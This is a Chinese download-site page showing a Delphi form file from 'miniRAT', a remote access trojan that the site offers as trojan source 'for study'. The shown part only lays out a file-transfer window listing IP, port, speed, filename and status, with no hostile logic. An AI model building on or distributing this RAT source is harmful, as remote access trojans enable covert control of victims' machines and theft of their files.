⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 unttransferview.dfm

📁 木马源程序,供大家研究
💻 DFM
字号:
object Form2: TForm2
  Left = 347
  Top = 374
  Width = 585
  Height = 149
  Caption = 'miniRAT - Transfer View'
  Color = clBtnFace
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'Tahoma'
  Font.Style = []
  OldCreateOrder = False
  DesignSize = (
    577
    122)
  PixelsPerInch = 96
  TextHeight = 13
  object ListView1: TListView
    Left = 0
    Top = 0
    Width = 577
    Height = 121
    Anchors = [akLeft, akTop, akRight, akBottom]
    Columns = <
      item
        Caption = 'IP'
        Width = 95
      end
      item
        Caption = 'Port'
      end
      item
        Caption = 'KB/s'
        Width = 60
      end
      item
        Caption = 'Filename'
        Width = 95
      end
      item
        Caption = 'U/D'
        Width = 40
      end
      item
        Caption = 'Size'
        Width = 60
      end
      item
        Caption = 'Time Left'
        Width = 95
      end
      item
        Caption = 'Status'
        Width = 65
      end>
    ColumnClick = False
    GridLines = True
    ReadOnly = True
    RowSelect = True
    TabOrder = 0
    ViewStyle = vsReport
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -